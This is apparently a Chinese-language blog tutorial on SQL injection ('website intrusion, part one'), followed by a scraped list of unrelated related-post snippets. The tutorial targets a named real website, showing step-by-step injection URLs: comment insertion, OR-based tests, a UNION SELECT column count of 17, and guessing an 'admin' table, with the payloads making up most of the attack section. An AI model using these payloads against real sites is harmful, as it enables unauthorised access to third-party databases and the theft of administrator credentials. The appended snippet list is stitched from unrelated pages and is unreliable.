php mysql网站入侵_第一篇:PHP+MySQL injection攻击:浅谈网页安全
什么意思呢??我想给大家看的是“/*XXXX*/”,没错,会编程的,都知道这是代码注释!换句话说,在代码编译的过程中,这部分会被忽略。充其量他就是个回车或者空格
怎么测试安全性呢?
在原来的地址上http://www.chts.cn/info.php?articleid=545
后面加上注释:
http://www.chts.cn/info.php?articleid=545/*ABCD234*/
再次访问,发现和原来的页面一样没变化。正常显示就表示这次是成功的注射。怎么说呢?
看这里:http://bbs.shudoo.com/viewthread.php?tid=1790611&extra=page%3D1
这个是GET方式提交吧?好吧好吧,注射就是注入,我们用GET的方式把恶意的语句插入到了原来的代码里就叫注入
我们加了/*ABCD234*/,原来的php代码就成了(没看get和post的就不会理解的)
'select * from chts_article where articleid=545/*ABCD234*/ 然后原本后面的语句仍然继续执行
这是注释插入,我们看到了插入了注释,充其量就是个空格或者回车。
我们继续访问http://www.chts.cn/info.php?articleid=545标题是《关于举办2005年全国公路治超与计重收费技术研讨会的通知》
变一下变量访问http://www.chts.cn/info.php?articleid=54标题是《关于举办2005年全国公路治超与计重收费技术研讨会的通知》
我们看到了两个不同标题的文档。编号545和编号54的文档。
我们下面用and和or来测试:
继续使用GET
http://www.chts.cn/info.php?articleid=545/*ABC*/orarticalid=54
原本articleid=545的页面就成了54号文档《关于举办2005年全国公路治超与计重收费技术研讨会的通知》了
这是怎么回事呢,就是一个逻辑门,学过编程的都应该知道这个。
再看原来的php语句就成了'SELECT * FROM chts_article WHERE articleid = 545/*ABCD234*/or articleid = 54
不懂编程的话,and和or你也就不用知道了
既然已经确定过滤不严漏洞存在了,就要猜表段数
其实这个比较机械,而且非常机械,网上的工具很多
这里我猜的表段是第17
http://www.chts.cn/info.php?articleid=545/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
这个当做是排座位好了,不需要理解太深(其实我也不怎么理解,我怕我说了不对被人笑哈)
好了,下面开始猜表段名我们假设是admin
那么语句就该是:
http://www.chts.cn/info.php?articleid=545/*Juliet_NaNa*/and/*Juliet_NaNa*/1=2/*Juliet_NaNa*/union/*Juliet_NaNa*/select/*Juliet_NaNa*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*Juliet_NaNa*/from/*Juliet_NaNa*/admin/*
显然显示错误
php mysql网站入侵_第一篇:PHP+MySQL injection攻击:浅谈网页安全相关推荐
- 架构师成长之旅_第一篇:插件与框架是什么?
架构师成长之旅_第一篇:c++插件开发 目录 踏入工作前的准备 框架是什么? 多人开发 一.踏入工作前的准备 在即将踏入工作时,最主要的是你的代码量和你编码能力,最重要的是你的代码质量,在编码界代码质 ...
- 车载以太网之DoIP协议_第一篇
车载以太网之DoIP协议_第一篇 1.DoIP含义 1.1 DoIP使用场景 1.2 DoIP在Autosar中的位置 2.以太网协议 2.1 物理层与数据链路层 2.2 网络层与传输层 2.3 Do ...
- python小海龟画粗细渐变的线_Python 笔记_第一篇_童子功_8. 画图工具 (小海龟 turtle)...
Python 笔记_第一篇_童子功_8. 画图工具 (小海龟 turtle) turtle 是一个简单的绘图工具 提供一个小海龟, 可以把它理解为一个机器人, 只能听懂有限的命令, 且绘图窗口的原点 ...
- mysql脚本解读_一篇很好的关于mysqld_safe脚本源码解读的文章,收藏了!!
#!/bin/sh# 一些状态变量的定义 KILL_MYSQLD=1; # 试图kill多余的mysqld_safe程序,1表示需要kill MYSQLD=# mysqld二进制可执行文件的名称 ni ...
- mysql人像伴随模型_还不了解MySQL跨行事务模型吗?看完这篇你也就差不多了!...
导读 说来和MySQL倒是有缘,毕业的第一份工作就被分配到了RDS团队,主要负责把MySQL弄到云上做成数据库服务.虽说整天和MySQL打交道,但说实话那段时间并没有很深入的理解MySQL内核,做的事 ...
- windows中MySQL主从配置【第一篇】
前言: windows系统配置MySQL主从复制,系统中需要安装两个MySQL服务.我本地用的是集成环境,集成环境已经有一个MySQL服务,那么就需要自己在单独下载安装一个MySQL服 ...
- mysql级联删除_近百道MySQL面试题和答案(2020收藏版)(完结篇)
7. 什么是死锁?怎么解决? 死锁是指两个或多个事务在同一资源上相互占用,并请求锁定对方的资源,从而导致恶性循环的现象. 常见的解决死锁的方法 1.如果不同程序会并发存取多个表,尽量约定以相同的顺序访 ...
- Python全栈开发记录_第一篇(循环练习及杂碎的知识点)
Python全栈开发记录只为记录全栈开发学习过程中一些难和重要的知识点,还有问题及课后题目,以供自己和他人共同查看.(该篇代码行数大约:300行) 知识点1:优先级:not>and 短路原则:a ...
- MySQL学习博客第一篇
RDBMS 术语 数据库: 数据库是一些关联表的集合. 数据表: 表是数据的矩阵.在一个数据库中的表看起来像一个简单的电子表格. 列: 一列(数据元素) 包含了相同类型的数据, 例如邮政编码的数据. ...
- mysql序列号生成_超详细的mysql数据库GTID介绍—概念、优缺点、原理、生命周期等
概述 这几天就简单介绍一下GTID好了~这篇是概念篇.. 从MySQL 5.6.5 开始新增了一种基于 GTID 的复制方式.通过 GTID 保证了每个在主库上提交的事务在集群中有一个唯一的ID.这种 ...
最新文章
- 使用Ansible中的playbook
- 计算机组成原理_在线作业_2,计算机组成原理_在线作业_2讲述.docx
- caffe loss layer
- 平面设计基础(PS)知识点总结
- 鱼塘钓鱼 (贪心+枚举)
- 查学籍网站报服务器错误,学籍系统常见问题
- 常见杀软对应的进程名
- 燃烧的远征服务器排队小程序,你还在让顾客排队吗?试试小程序吧!让顾客不再排队!...
- 商丘服务器维修,商丘联想服务器维修网点
- QEMU虚拟磁盘资料
- 百度云盘 油猴下载助手脚本【绝对可用】
- r语言做绘制精美pcoa图_如何绘制精美的PCoA图形
- 【源译】Optimizeit Profiler概览
- P7560-[JOISC 2021 Day1]フードコート【吉司机线段树】
- 佛罗里达大学计算机科学专业排名,2019年南佛罗里达大学计算机科学专业排名情况如何?...
- mysql事务(详解)
- <马哲>如何认识把握对立统一规律?
- unknown mutation type:
- 做影视后期常用的行业软件
- ENVI基于训练样本的决策树地块分类